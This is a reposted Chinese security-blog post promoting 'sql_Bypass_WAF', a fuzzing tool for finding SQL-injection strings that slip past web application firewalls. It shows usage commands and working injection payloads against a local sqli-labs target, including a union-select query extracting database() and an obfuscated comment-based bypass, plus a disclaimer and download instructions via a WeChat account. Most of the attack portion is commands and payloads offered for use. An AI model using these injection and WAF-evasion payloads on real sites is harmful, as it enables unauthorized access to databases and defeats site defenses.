sql注入bypass waf工具(1月18日更新)

admin 2023年1月21日09:50:11评论94 views字数 1286阅读4分17秒阅读模式

===================================

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

sql_Bypass_WAF是一款sql注入绕waf工具,通过fuzz的方式,进行大量测试找到bypass语句。

0x02 安装与使用

1、-h查看参数帮助

sql注入bypass waf工具(1月18日更新)

2、先判断出waf拦截的sql恶意语句。

sql注入bypass waf工具(1月18日更新)

3、再将想要Bypass的语句带入到工具中,注意带入到工具中的url为waf拦截的url。

如果bypass一个参数,用"~"进行包裹,如

http://192.168.170.133/sqli/less-1/?id=1' and 1=1 --+将"and"用~包裹后:http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+

命令示例:

sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' ~and~ 1=1 --+"

sql注入bypass waf工具(1月18日更新)

sql注入bypass waf工具(1月18日更新)

如果为两个参数,在两个参数中间加"^",如

http://192.168.170.133/sqli/less-1/?id=1' order by 1 --+"order by"用^指定http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+

命令示例:

sql_Bypass_WAF.exe -s "http://192.168.170.133/sqli/less-1/?id=1' order^by 1 --+"

sql注入bypass waf工具(1月18日更新)

sql注入bypass waf工具(1月18日更新)

暂不支持超过两个参数的fuzz,但可以拆分依次带入测试,如:

测试语句:

http://192.168.170.133/sqli/less-1/?id=-1' union select 1,database(),3 --+先bypass"union select"http://192.168.170.133/sqli/less-1/?id=-1' union^select 1,2,3 --+bypass后语句:http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,2,3 --+再bypass"database()"http://192.168.170.133/sqli/less-1/?id=-1' union/*////%//select 1,database^(),3 --+

0x03 项目链接下载

1、通过阅读原文,到项目地址下载

2、关注公众号web安全工具库,后台回复:工具666

3、每日抽奖送书

sql注入bypass waf工具(1月18日更新)



· 推 荐 阅 读 ·

本书以图解的方式讲述数据结构及其算法,力求简洁明了地阐述复杂的算法理论,以C作为描述语言解析算法的执行过程,以大量的范例程序来展示数据结构的使用及其相关算法的具体实现。

原文始发于微信公众号(Web安全工具库):sql注入bypass waf工具(1月18日更新)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月21日09:50:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sql注入bypass waf工具(1月18日更新)https://cn-sec.com/archives/1523415.html

发表评论

匿名网友 填写信息